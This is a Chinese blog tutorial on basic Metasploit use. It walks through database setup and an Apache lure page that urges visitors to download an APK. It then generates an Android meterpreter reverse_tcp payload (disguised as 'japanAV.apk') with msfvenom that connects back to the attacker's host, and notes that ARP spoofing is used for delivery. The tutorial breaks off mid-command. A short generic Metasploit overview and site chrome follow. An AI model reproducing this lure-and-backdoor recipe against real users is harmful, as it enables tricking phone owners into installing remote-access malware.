metasploit基础使用

虽然开通csdn已经有一段时间了,可是一直由于各方面原因没有使用过csdn,在开始学东西之前,大牛们一直说要写一些东西来记录,一直深以为然,所以准备坚持这个好习惯,来一个好的开始,接触metasploit这个工具有一段时间了,虽然不能灵活运用,但进行一些基础的渗透和攻击测试还是比较轻松的,一直在kali上使用metasploit,因为kali集成了很多工具,使用起来比较方便,本人也偏爱  kali,在windows上也试验了metasploit,但是由于环境不够完善,进行一次完整的渗透测试比较困难,在windows上我使用的是pentestbox这个软件,这是windows上的渗透测试神器,它集成了很多诸如sqlmap,ettercap,burp还有metasploit等工具,感兴趣的可以看看这个[pentestbox链接](http://www.freebuf.com/sectool/120877.html),下面我们开始

1.环境准备:

攻击者(windows或linux下有渗透测试环境的主机,包括nmap,metasploit,ettercap,apache服务器)ip:192.168.1.106

2.渗透测试攻击者主机环境搭建:

root@KALI:/# service postgresql start 
root@KALI:/# msfconsole
msf > db_status 
[*] postgresql connected to msf4

在这一步先开启postgresql的数据库,然后进入msf,其中db_status用来检查数据库连接状态,如果数据库没有创建或自动连接,比如下面所示

msf > db_status 
[*] postgresql selected, no connection

可以在msf外面新建一个数据库,我这里就是自己新建的数据库msf4,具体操作流程如下:
首先退出msf,进入数据库:

~# su postgres

创建新的用户并指定密码:
$ createuser msf4 -P
然后输入两次密码即可

创建数据库并指定数据库所有者为msf4,数据库名称也为msf4
$ createdb --owner=msf4 msf4
退出数据库并重启postgresql
service postgresql restart
然后进入msf进行连接:
msf > db_connect msf4:msf4@localhost/msf4
[*] Rebuilding the module cache in the background...
msf > db_status
[*] postgresql connected to msf5

稍等片刻正在后台重建数据库,然后就可以使用了

然后开启kali的apache2服务器,用于arp欺骗后的恶意文件传输

root@KALI:~# /etc/init.d/apache2 start 
[ ok ] Starting apache2 (via systemctl): apache2.service.

然后配置apache2服务器的主页,kaliRolling版本的在目录:
/var/www/html/index.html
配置一个可以下载文件html网页,实例如下:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
 <HEAD>
  <meta http-equiv="Content-Type" content="text/html">
  <TITLE>Page de test de l'installation d'Apache</TITLE>
 </HEAD>
<!-- Background white, links blue (unvisited), navy (visited), red
(active) -->
 <BODY
  BGCOLOR="#FFFFFF"
  TEXT="#000000"
  LINK="#0000FF"
  VLINK="#000080"
  ALINK="#FF0000"
 >
<a><strong>This is a very beautiful apk,look look!!!<br></br></strong></a>
<img src=http://192.168.1.106/timg.jpg height="500" width="330">
<a href="http://192.168.1.106/text.apk"><strong><br></br>[Download]</strong></a>
</BODY>
</HTML>

将制作好的文件放在同一目录下,并修改文件中的相应位置即可,这里是http://192.168.1.106/timg.jpg
http://192.168.1.106/text.apk 图片自己去下载一个放上去,用来吸引视线。

3.android手机的metasploit渗透攻击:

攻击目标android手机ip:192.168.1.115

本次渗透攻击我们使用payload里面的reverse_tcp进行攻击测试
首先在主机上利用msfvenom的功能生成恶意apk文件:

root@KALI:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=5555 R > /root/japanAV.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8845 bytes

可以使用msfvenom -h 查看使用方法,这里-P是指定利用模块,后面LHOST和LPORT配置参数,指定到我本机的5555端口

然后将生成的apk文件放到上述index.html的地址,并修改html文件中的apk名称:

root@KALI:~# cp /root/japanAV.apk /var/www/html/
root@KALI<
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
Metasploit是一个广泛使用渗透测试工具,用于发现和利用安全漏洞。下面是一个简要的Metasploit使用教程: 1. 安装Metasploit:你可以从官方网站(https://www.metasploit.com/)下载Metasploit框架。根据你的操作系统选择适当的版本,并按照安装指南进行安装。 2. 了解基础知识:在使用Metasploit之前,建议你对网络协议、漏洞利用和渗透测试基础知识有一定的了解。这将帮助你更好地理解和使用Metasploit。 3. 启动Metasploit:安装完成后,你可以通过命令行或者图形界面启动Metasploit。启动后,你将看到一个交互式的命令行界面。 4. 扫描目标:在使用Metasploit之前,你需要扫描目标网络或主机来发现潜在的漏洞。你可以使用Nmap等工具进行端口扫描、服务识别等操作。 5. 选择并配置模块:Metasploit提供了许多不同类型的模块,包括扫描模块、漏洞利用模块、Payload模块等。你可以使用search命令查找相关模块,并使用use命令选择需要的模块。 6. 设置目标:使用set命令配置目标主机的IP地址、端口等信息。你还可以使用options命令查看和修改模块的参数设置。 7. 运行模块:配置完成后,你可以使用exploit命令运行模块。Metasploit将尝试利用已知漏洞攻击目标主机。 8. 获取访问权限:成功运行模块后,你可能会获得对目标主机的访问权限。这包括远程命令执行、文件上传/下载等功能。 请注意,Metasploit是一个强大的工具,需要在合法授权和合规的情况下使用。在进行任何渗透测试活动之前,务必遵循适当的法律和道德准则,并获得相关许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值